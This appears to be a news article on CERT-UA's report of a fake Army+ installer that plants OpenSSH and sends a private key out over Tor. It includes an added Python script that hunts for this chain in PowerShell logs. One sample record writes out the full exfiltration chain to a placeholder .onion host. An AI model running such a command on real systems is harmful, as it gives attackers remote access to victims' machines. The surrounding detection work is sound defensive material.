The Computer Emergency Response Team of Ukraine (CERT-UA) has reported that the cyber threat actor UAC-0125 is using Cloudflare Workers to distribute malware disguised as the Army+ app. This app, launched by Ukraine's Ministry of Defence in August 2024, aims to digitize the armed forces' operations.
The fake Army+ app is promoted via malicious websites hosted on Cloudflare Workers, where users are tricked into downloading a Windows executable disguised as the legitimate app. The installer, built with the Nullsoft Scriptable Install System (NSIS), displays a decoy file to the user while silently executing a PowerShell script. This script installs OpenSSH on the victim's machine, generates an RSA key pair, and sends the private key to an attacker-controlled server over the Tor network, granting the threat actor remote access to the compromised system.
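The chain described above (OpenSSH installed, an RSA key pair generated, the private key read back and pushed out over Tor) is unusual as a single PowerShell script block, which makes it a reasonable thing to hunt for in PowerShell Script Block Logging (Event ID 4104). The following is an added example, not code from CERT-UA or the article: it scores constructed script-block records against indicators for each stage and flags only records that show several stages together. The indicator patterns and every sample record are assumptions for illustration; the article publishes no script contents, file paths or infrastructure, and the `.onion` host in the sample is an obvious placeholder.

```python
"""Heuristic triage of PowerShell script-block records for the
OpenSSH + RSA key + Tor pattern described in the CERT-UA report.
Added example; indicator patterns and sample records are constructed."""
import re
from dataclasses import dataclass

# One indicator per stage of the reported chain. None of these is malicious
# alone (admins install OpenSSH and run ssh-keygen), so findings are scored
# by how many stages appear in the same script block.
INDICATORS = [
    ("openssh_install", re.compile(r"Add-WindowsCapability\b.*OpenSSH|sshd(?:\.exe)?\b", re.I)),
    ("rsa_keygen", re.compile(r"ssh-keygen\b.*-t\s+rsa|System\.Security\.Cryptography\.RSA", re.I)),
    ("tor_transport", re.compile(r"\btor(?:\.exe)?\b|\.onion\b|--SocksPort|socks5h?://127\.0\.0\.1", re.I)),
    ("private_key_read", re.compile(r"id_rsa(?!\.pub)\b", re.I)),
]


@dataclass
class Finding:
    record_id: int
    hits: list  # indicator labels that matched, in INDICATORS order

    def score(self) -> int:
        return len(self.hits)


def analyze_record(record_id: int, script_text: str) -> Finding:
    """Match every indicator against one script block (Event 4104 ScriptBlockText)."""
    hits = [label for label, rx in INDICATORS if rx.search(script_text)]
    return Finding(record_id, hits)


def triage(records: dict, threshold: int = 3) -> list:
    """Return findings whose stage count reaches the threshold, lowest id first."""
    findings = [analyze_record(rid, text) for rid, text in sorted(records.items())]
    return [f for f in findings if f.score() >= threshold]


# Constructed sample records keyed by a fake event record id.
# 1: routine OpenSSH server setup   2: routine key generation
# 3: all stages of the reported chain in one block (placeholder host)
SAMPLE_RECORDS = {
    1: r"Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0; Start-Service sshd",
    2: r"ssh-keygen -t rsa -b 4096 -f $env:USERPROFILE\.ssh\id_rsa -N ''",
    3: (r"Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0; "
        r"ssh-keygen -t rsa -b 2048 -f C:\ProgramData\x\id_rsa -N ''; "
        r"& C:\ProgramData\x\tor.exe --SocksPort 9050; "
        r"$k = Get-Content C:\ProgramData\x\id_rsa -Raw; "
        r"Invoke-RestMethod -Uri http://PLACEHOLDER-EXAMPLE.onion/ -Method Post -Body $k"),
}

if __name__ == "__main__":
    for finding in triage(SAMPLE_RECORDS):
        print(f"record {finding.record_id}: {finding.score()} stages -> {finding.hits}")
```

Records 1 and 2 each score below the threshold (one and two stages), while record 3 is the only one reported. In a real deployment the same scoring would run over Event 4104 `ScriptBlockText` fields collected from endpoints, with the threshold tuned to how much OpenSSH administration the environment legitimately sees.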
CERT-UA has linked UAC-0125 to another notorious Russian-backed APT group, UAC-0002, also known as APT44, FROZENBARENTS, and several other aliases. This group is believed to be affiliated with Unit 74455 of the Russian GRU (Main Directorate of the General Staff of the Armed Forces).
This attack highlights an ongoing trend of cybercriminals abusing legitimate cloud services, such as Cloudflare Workers, to host malicious content. Earlier in 2024, Fortra reported a sharp rise in phishing attacks using Cloudflare Workers and Pages, with phishing incidents on Cloudflare Pages increasing by 198% and those on Cloudflare Workers growing by 104% from 2023 to mid-October 2024.
The development comes amidst the European Council’s recent sanctions targeting individuals and entities involved in Russia’s destabilizing actions, including those linked to the GRU. These sanctions target entities involved in disinformation campaigns, foreign assassinations, and cyberattacks across Europe, as well as actors promoting Russian propaganda in Africa.
The growing abuse of legitimate services for cyberattacks underscores the evolving tactics of threat actors seeking to exploit trusted platforms for malicious purposes.